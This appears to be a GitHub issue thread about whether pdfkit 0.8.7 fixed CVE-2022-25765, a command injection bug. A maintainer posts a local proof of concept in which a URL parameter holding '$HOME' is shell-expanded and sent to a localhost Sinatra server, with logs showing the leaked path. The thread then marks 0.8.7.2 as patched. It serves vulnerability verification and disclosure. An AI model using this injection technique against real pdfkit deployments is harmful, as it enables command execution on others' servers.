CVE 2022-25765 was fixed

[BigG1947]

Hi, it's look like CVE-2022-25765 was fixed in 0.8.7v.
Can i create pr with patched CVE-2022-25765.yml?

[MuhammetDilmac]

It's not fixed. @postmodern
Please mark vulnerable version v0.8.7

pdfkit/pdfkit#517

[postmodern]

Had to confirm locally:

source 'https://rubygems.org/'

# `dnf install wkhtmltopdf` / `apt install wkhtmltopdf`
gem 'pdfkit', '~> 0.8.7'
gem 'webrick'
gem 'sinatra'

require 'bundler/setup'
require 'pdfkit'
PDFKit.new("http://localhost:3000/?home=$HOME").to_pdf

require 'bundler/setup'
require 'sinatra/base'

class App < Sinatra::Base

  get '/' do
    puts "Received HOME: #{params['home']}"

    halt 200, "Got your HOME lol"
  end

end

App.run!(host: 'localhost', port: 3000)

In terminal 1:

$ ruby test.rb

In terminal 2:

$ ruby app.rb 
[2022-10-08 01:36:48] INFO  WEBrick 1.7.0
[2022-10-08 01:36:48] INFO  ruby 3.1.2 (2022-04-12) [x86_64-linux]
== Sinatra (v3.0.1) has taken the stage on 3000 for development with backup from WEBrick
[2022-10-08 01:36:48] INFO  WEBrick::HTTPServer#start: pid=35616 port=3000
Received HOME: /home/postmodern
::1 - - [08/Oct/2022:01:36:51 PDT] "GET /?home=/home/postmodern HTTP/1.1" 200 17
- -> /?home=/home/postmodern

[postmodern]

Now waiting for the maintainer to review pdfkit/pdfkit#519

[rustygeldmacher]

Looks like the good pdfkit folks just released 0.8.7.2 that included the fix for this CVE

[postmodern]

Marked >= 0.8.7.2 as patched.